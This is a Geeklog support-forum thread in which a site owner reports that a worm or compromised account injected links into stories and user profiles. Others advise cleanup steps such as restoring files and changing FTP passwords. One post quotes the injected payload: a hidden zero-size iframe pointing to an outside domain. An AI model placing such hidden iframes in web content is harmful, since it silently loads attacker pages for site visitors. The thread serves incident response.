Welcome to Geeklog, Anonymous Friday, July 19 2024 @ 02:26 am EDT

Geeklog Forums

worm infection


ismael

Anonymous
Hi,

last night i sufered a worm infection. I use geeklok 1.4.1. All my stories and comments has an m.winxyz.com reference.

Thank you,
ismael
 Quote

ismael

Anonymous
every new user has this web in his profile: <iframe src=http://m.winxyz.com width=0 height=0></iframe>
 Quote

ismael

Anonymous
can it be due to fckeditor sql injection?
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
No idea where it's coming from but it sounds like files on your server were modified, so it could be that your server was compromised.

Searching Google for "m.winxyz.com" finds a lot of hits on other sites (many not running Geeklog), so it doesn't seem to be limited to Geeklog sites.

Make a database backup and check if that link is in there somewhere. If it isn't, the easiest way would be to remove all the files and upload everything fresh, then use the same database.

bye, Dirk
 Quote

ismael

Anonymous
more info about this.

i detected the problem become from a user that has stort admin privilegies. It seems that this user has a troyan that take access to my geeklog site and modifies his stories.

now this user is suspended, but i'm really worried about this situation if the security of my site depends on my users security.

This morning, all accounts on my site have his profile modified, also my profile as admin. I can't explain myself.

The geeklog files are not been modified.

Thank you,
ismael
 Quote

Status: offline

guganbl

Forum User
Chatty
Registered: 05/12/07
Posts: 57
I had a similar problem some time ago. The reason was compromised ftp account.
Person that used that account had a virus and from that moment something started inserting linest that pointed to other infected sites in my gl. I downloaded complete gl, and scanned all files to fine code, and than replaced those files.
Faster way to deal with this is to replace all files , and use same old DB as Dirk told you.
And change password on your ftp account, just in case Smile
 Quote

All times are EDT. The time is now 02:26 am.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content